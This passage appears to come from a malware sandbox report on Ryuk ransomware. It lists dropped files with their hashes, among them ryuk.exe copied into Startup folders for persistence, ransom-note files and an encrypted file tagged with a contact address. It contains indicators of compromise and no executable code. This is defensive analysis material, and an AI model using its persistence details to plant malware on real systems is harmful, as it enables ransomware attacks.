65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\ProgramData\RYUKID
Filesize
8B

MD5
9c2ac4bed585b59bfd5cd797bf7f9f96

SHA1
f70dd2b190d6dc2537d9797041155cbffe94c37b

SHA256
1774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35

SHA512
55f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1

Download Submit
C:\ProgramData\RyukReadMe.html
Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\RyukReadMe.html.[Vulcanteam@CYBERFEAR.COM].RYK
Filesize
858B

MD5
4b50035e27e1d6ce815243181bf2566d

SHA1
e4d79b2b99ba166924e39c5231b2a814503c1440

SHA256
1f8eefea2f1df6c92e2a70bbdecace76686f62d3ac58f182f4eb66008a29bc0f

SHA512
ff6450dc7fcd80f0882af38915ee714488356b6c664c4ee5f358732eb916b9832e1cbe08975c3a32c925ef314680f32822ade29ed5bc60f5c3f0500e6c69aa51

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
a967c36c1b87375882710936daa98ff3

SHA1
c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090

SHA256
eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50

SHA512
d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
a967c36c1b87375882710936daa98ff3

SHA1
c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090

SHA256
eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50

SHA512
d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
a967c36c1b87375882710936daa98ff3

SHA1
c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090

SHA256
eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50

SHA512
d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
c8d691d74fbebbd6e92f6c805f48af65

SHA1
72bc5685a81374cd18394ae2fae1276b7a4189f6

SHA256
912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29

SHA512
9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
c8d691d74fbebbd6e92f6c805f48af65

SHA1
72bc5685a81374cd18394ae2fae1276b7a4189f6

SHA256
912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29

SHA512
9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
c8d691d74fbebbd6e92f6c805f48af65

SHA1
72bc5685a81374cd18394ae2fae1276b7a4189f6

SHA256
912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29

SHA512
9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
9c2ac4bed585b59bfd5cd797bf7f9f96

SHA1
f70dd2b190d6dc2537d9797041155cbffe94c37b

SHA256
1774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35

SHA512
55f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
a967c36c1b87375882710936daa98ff3

SHA1
c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090

SHA256
eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50

SHA512
d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
c8d691d74fbebbd6e92f6c805f48af65

SHA1
72bc5685a81374cd18394ae2fae1276b7a4189f6

SHA256
912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29

SHA512
9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads